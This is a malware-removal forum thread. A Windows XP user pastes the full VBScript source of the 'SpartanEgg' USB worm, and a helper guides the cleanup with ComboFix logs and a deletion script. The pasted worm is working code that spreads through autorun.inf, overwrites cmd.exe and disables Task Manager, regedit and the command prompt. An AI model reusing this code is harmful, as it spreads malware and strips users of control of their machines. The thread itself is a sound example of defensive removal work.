I don't know what is this (virus, spyware, malware, etc.) but it is on my PC running windows XP. I first noticed this thing when my KIS7 detected it as a trojan but was not able to quarantine or delete it because it reported that "the file does not exist." then it prompted me to roll back the action purportedly done by this trojan, and my PC ran normally. The next day, my son was playing game on my PC when suddenly it freezes. That's when i discovered that the trojan came back again and was allowed to run by my son (he didn't know of course what it is). I checked KIS7 and there i found out that it is Spartanegg11.log.vbs. I ran a full scan but still it remained 'untreated'. So i copied it's path and ran WinPE. I ran regedit and deleted every occurence of spartanegg11.log.vbs. My PC returns to normal..maybe for now. I don't know if i've done the right thing. I hope so. But this i noticed: every time i double-click my drives (C&D) i got a message that spartanegg11.log.vbs is missing and i can't open it this way. Is there a way to fix this? For any help on this, i thank you. Here's the copy of the SpartanEgg11.log.vbs 'This is just a modified version! 'mabuhay ang Pilipinas! 'Spartan Egg By: Charlie Delta---Bacolod City--April 2008 'Oink...6100 phils. On Error Resume Next Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd mycmdfile = "cmd.exe" mydate = month(now()) myvbsalias = "SpartanEgg" & mydate myvbsfile = myvbsalias & ".log.vbs" atr = "[autorun]" & vbCrLf & _ "shellexecute=wscript.exe " & myvbsfile Set fs = CreateObject("Scripting.FileSystemObject") Dim mf, text, size Set mf = fs.GetFile(WScript.ScriptFullname) size = mf.size check = mf.Drive.drivetype Set text = mf.openastextstream(1, -2) Do While Not text.atendofstream mysource = mysource & text.readline mysource = mysource & vbCrLf Loop Do Set winpath = fs.GetSpecialFolder(0) Set tf = fs.GetFile(winpath & "\" & myvbsfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True) tf.Write mysource tf.Close Set tf = fs.GetFile(winpath & "\" & myvbsfile) tf.Attributes = 39 If (mydate = "12") Then Set winsyspath = fs.GetSpecialFolder(1) cmd = "@echo off" & vbCrLf & _ "wscript " & winpath & "\" & myvbsfile Set tf = fs.GetFile(winsyspath & "\" & mycmdfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2) tf.Write cmd tf.Close End If dim myday myday = day(now())& hour(now())& minute(now()) if (myday = "131515") Then msgbox "13th day on 15:15 hr Cracked!?...By: ©Spartan Egg™" End If For Each flashdrive In fs.drives If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True) tf.Write mysource tf.Close Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) tf.Attributes = 39 Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") tf.Attributes = 32 Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True) tf.Write atr tf.Close Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") tf.Attributes = 39 End If Next Set rg = CreateObject("WScript.Shell") rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di sableRegistryTools", 1, "REG_DWORD" rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig", winpath & "\" & myvbsfile rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Hacked By: © Spartan Egg™...6100 phils.!mabuhay ang Pilipinas!" rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di sableTaskMgr", 1, "REG_DWORD" rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced \Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD" rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" If check <> 1 Then WScript.sleep 8000 End If Loop While (check <> 1) Set sd = CreateObject("WScript.Shell") sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
Hey donex7 Now, please download ComboFix. With ComboFix, at the download window, please rename it to Combo-Fix(.exe) before downloading it. Save it to your Desktop. Please disable all security programs, such as antiviruses, antispywares, and firewalls. • Run Combo-Fix.exe and follow the prompts. • Accept the End-User License Agreement. • Allow the Recovery Console to be installed. • When you see the window below, click on Yes. • When the Recovery Console has been installed, click on Yes to start the scan. **Understand that things like your system clock changing and your desktop disappearing might happen. Do not worry, because all will be restored later. • Wait for the scan to be fully completed. • If it requires a reboot, please do so. • After the scan has completed entirely, please post the log here. The log will be located at C:\ComboFix(.txt) Do not click on the ComoboFix window, as it may cause it to stall. Best Regards
Hello cdavfrew, Thank you for taking time helping me out of this trouble. I just finished doing what you said. I suspect that i got this SpartanEgg11.log.vbs from my workplace because my flash drive is infected. When i inserted it last night KIS7 deteceted it once again but still was not able to delete it but rollback the action of this virus/malware. I already reformatted my flash drive. Here's the log of Combofix: ComboFix 08-11-27.01 - Donex 2008-11-27 22:07:26.1 - NTFSx86 Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1332 [GMT -8:00] Running from: D:\Malware Tool\Combo-Fix.exe * Created a new restore point WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !! . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . C:\autorun.inf D:\Autorun.inf . ((((((((((((((((((((((((( Files Created from 2008-10-28 to 2008-11-28 ))))))))))))))))))))))))))))))) . 2008-11-27 22:09 . 2008-11-27 22:10 114 -rahs---- C:\autorun.inf 2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\WINDOWS\SpartanEgg11.log.vbs 2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\SpartanEgg11.log.vbs 2008-11-26 20:19 . 2008-11-26 20:19 68,096 --a------ C:\WINDOWS\ScUnin.exe 2008-11-26 20:19 . 2008-11-26 20:20 12,265 --a------ C:\WINDOWS\scunin.dat 2008-11-26 20:19 . 2008-11-26 20:19 967 --a------ C:\WINDOWS\ScUnin.pif 2008-11-26 20:18 . 2008-11-27 19:54 <DIR> d-------- C:\Program Files\Starcraft 2008-11-26 08:57 . 2008-11-26 08:57 <DIR> d-------- C:\Program Files\inKline Global 2008-11-26 08:55 . 2008-11-26 08:55 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Media Player Classic 2008-11-26 08:53 . 2008-11-26 08:53 <DIR> d-------- C:\Program Files\Foxit Software 2008-11-26 08:44 . 2008-11-26 08:44 <DIR> d-------- C:\Program Files\K-Lite Codec Pack 2008-11-26 08:34 . 2008-11-26 08:34 <DIR> d--hs---- C:\Diskeeper 2008-11-26 08:23 . 2008-11-26 08:23 <DIR> d-------- C:\Program Files\Diskeeper Corporation 2008-11-26 07:59 . 2008-11-26 08:08 <DIR> d-------- C:\Program Files\Winamp 2008-11-26 07:59 . 2005-12-04 21:12 20,640 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys 2008-11-26 07:55 . 2008-11-26 07:55 <DIR> d-------- C:\WINDOWS\Modio 2008-11-26 07:55 . 2002-01-29 04:28 220,432 -ra------ C:\WINDOWS\system32\drivers\slntamr.sys 2008-11-26 07:55 . 2002-01-29 04:28 220,432 --a--c--- C:\WINDOWS\system32\dllcache\slntamr.sys 2008-11-26 07:55 . 2001-11-29 08:10 33,028 -ra------ C:\WINDOWS\system32\drivers\slwdmsup.sys 2008-11-26 07:55 . 2001-11-29 08:10 33,028 --a--c--- C:\WINDOWS\system32\dllcache\slwdmsup.sys 2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a------ C:\WINDOWS\system32\drivers\MODEMCSA.sys 2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a--c--- C:\WINDOWS\system32\dllcache\modemcsa.sys 2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\ATI 2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\ATI 2008-11-25 22:02 . 2008-11-25 22:02 <DIR> d-------- C:\Documents and Settings\Administrator 2008-11-24 21:56 . 2005-04-15 10:58 1,351,392 --a------ C:\WINDOWS\system32\COMCTL32.OCX 2008-11-24 21:56 . 2007-03-12 07:16 1,146,184 --a------ C:\WINDOWS\system32\FM20.DLL 2008-11-24 21:56 . 2005-04-15 10:58 1,071,088 --a------ C:\WINDOWS\system32\MSCOMCTL.OCX 2008-11-24 21:56 . 2007-03-12 07:16 212,240 --a------ C:\WINDOWS\system32\RICHTX32.OCX 2008-11-24 21:56 . 2007-03-12 07:16 152,848 --a------ C:\WINDOWS\system32\COMDLG32.OCX 2008-11-24 21:56 . 2007-03-12 07:16 40,960 --a------ C:\WINDOWS\system32\SSUBTMR6.DLL 2008-11-24 21:56 . 2007-03-12 07:16 32,584 --a------ C:\WINDOWS\system32\FM20ENU.DLL 2008-11-24 21:56 . 2007-03-12 07:16 10,752 --a------ C:\WINDOWS\system32\aamd532.dll 2008-11-24 21:47 . 2008-11-24 21:56 <DIR> d-------- C:\Program Files\AutoPatcher 2008-11-24 21:06 . 2008-11-24 21:57 <DIR> d-------- C:\XP Auto Patcher 2008-11-24 21:03 . 2008-11-24 21:04 <DIR> d-------- C:\XP Drivers 2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a------ C:\WINDOWS\system32\drivers\usbccgp.sys 2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a--c--- C:\WINDOWS\system32\dllcache\usbccgp.sys 2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware 2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Malwarebytes 2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes 2008-11-24 14:29 . 2008-10-22 16:10 38,496 --a------ C:\WINDOWS\system32\drivers\mbamswissarmy.sys 2008-11-24 14:29 . 2008-10-22 16:10 15,504 --a------ C:\WINDOWS\system32\drivers\mbam.sys 2008-11-24 14:26 . 2008-11-24 14:26 <DIR> d-------- C:\WINDOWS\system32\SupportAppXL 2008-11-24 14:26 . 2008-11-26 10:28 <DIR> d-------- C:\Program Files\SMART BRO 2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbser6k.sys 2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmeaext.sys 2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmea.sys 2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbmdm6k.sys 2008-11-24 14:25 . 2004-08-03 23:08 26,496 --a--c--- C:\WINDOWS\system32\dllcache\usbstor.sys 2008-11-24 14:08 . 2008-11-24 14:08 <DIR> d-------- C:\Program Files\Kaspersky Lab 2008-11-24 14:08 . 2008-11-27 19:55 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab 2008-11-24 14:08 . 2008-11-27 22:10 2,406,688 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat 2008-11-24 14:08 . 2008-11-24 18:11 96,976 --a------ C:\WINDOWS\system32\drivers\klin.dat 2008-11-24 14:08 . 2008-11-24 18:11 87,855 --a------ C:\WINDOWS\system32\drivers\klick.dat 2008-11-24 14:08 . 2008-11-27 22:09 51,488 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat 2008-11-24 14:08 . 2008-11-27 22:09 35,276 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx 2008-11-24 14:08 . 2008-11-27 22:09 6,824 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx 2008-11-24 14:07 . 2008-11-24 14:07 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2008-11-26 16:57 --------- d--h--w C:\Program Files\InstallShield Installation Information 2008-11-25 02:11 112,144 ----a-w C:\WINDOWS\system32\drivers\kl1.sys 2008-11-24 21:42 315,392 ----a-w C:\WINDOWS\HideWin.exe 2008-11-24 21:42 --------- d-----w C:\Program Files\Realtek 2008-11-24 21:40 --------- d-----w C:\Program Files\ATI Technologies 2008-11-24 21:39 --------- d-----w C:\Program Files\Common Files\ATI Technologies 2008-11-24 21:32 --------- d-----w C:\Program Files\Common Files\InstallShield 2008-11-24 21:15 --------- d-----w C:\Program Files\microsoft frontpage 2008-09-16 00:14 3,596,288 ----a-w C:\WINDOWS\system32\qt-dx331.dll 2008-09-16 00:12 81,920 ----a-w C:\WINDOWS\system32\dpl100.dll 2008-09-16 00:11 683,520 ----a-w C:\WINDOWS\system32\divx.dll . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "StartCCC"="C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 12:17 61440] "Malwarebytes' Anti-Malware"="C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" [2008-10-22 16:10 399504] "DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2006-10-04 12:38 163840] "MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056] "AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" [2008-02-08 18:36 227856] "RTHDCPL"="RTHDCPL.EXE" [2008-02-18 23:34 16858112 C:\WINDOWS\RTHDCPL.exe] C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ Reboot.exe [2006-12-29 02:35:16 409088] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system] "DisableRegistryTools"= 1 (0x1) "DisableTaskMgr"= 1 (0x1) [HKEY_LOCAL_MACHINE\software\microsoft\security center] "AntiVirusDisableNotify"=dword:00000001 "UpdatesDisableNotify"=dword:00000001 [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus] "DisableMonitoring"=dword:00000001 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile] "EnableFirewall"= 0 (0x0) [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= R2 Autorun CDROM Monitor;Autorun CDROM Monitor;C:\WINDOWS\system32\SupportAppXL\cdrom_mon.exe [2008-11-24 14:26:04 81920] R2 MBAMService;MBAMService;"C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe" [2008-11-24 14:29:16 170640] R3 AtiHdmiService;ATI Function Driver for HDMI Service;C:\WINDOWS\system32\drivers\AtiHdmi.sys [2008-11-24 13:34:28 84992] R3 klim5;Kaspersky Anti-Virus NDIS Filter;C:\WINDOWS\system32\DRIVERS\klim5.sys [2007-12-13 13:28:40 24592] R3 MBAMProtector;MBAMProtector;\??\C:\WINDOWS\system32\drivers\mbam.sys [2008-11-24 14:29:17 15504] S3 V90drv;v90drv;C:\WINDOWS\system32\DRIVERS\v90drv.sys [2001-11-29 08:10:32 1432836] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}] \Shell\AutoRun\command - F:\AutoRun.exe
Hey donex7 Sorry for the late reply... Please disable all security programs, such as antiviruses, antispywares, and firewalls. Also disable your internet connection. Open Notepad and copy/paste the text in the code box below into it: Code: File:: C:\autorun.inf C:\WINDOWS\SpartanEgg11.log.vbs C:\SpartanEgg11.log.vbs C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Reboot.exe Registry:: [-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}] • Save this as CFScript.txt in the same folder as ComboFix. • Then drag the CFScript.txt into Combo-Fix.exe. • This will start ComboFix again. After reboot, (in case it asks to reboot), post the ComboFix log here. The log will be located at C:\ComboFix(.txt). Do not click on the ComoboFix window, as it may cause it to stall. Any more problems? Best Regards
To cdavfrew, My PC is clean now after i've done all what you said. I did not bother to post the log here anymore as it only reported it deleted Spartanegg11.log.vbs in Drive C, C\WINDOWS, also deleted Reboot.exe and the mountpoints2 autorun...that's all. I've tried to access the following: run command, task manager,DOS, and yes i can already access all of them which i am not able to when Spartanegg11.log.vbs was still in command. I can also reset the attributes of the folders/files now to hidden or shown..before it is always hidden. And most of all, my PC speed has returned to normal. No more freezing/delaying time. Now what can i say? It's a big, big thanks to you.. My best regards..
Hey donex7 Glad to hear that your problem is fixed, and there's really no need for the ComboFix log anymore. However, I'd like you to follow one final instruction: Find this folder, C:\Qoobox, zip it up, and upload it to http://www.uploadmalware.com/ Best Regards
To cdavfre, sorry for the delayed response. just want to thank you again and to let you know that i've uploaded already the requested file to the link you provided. all the best..
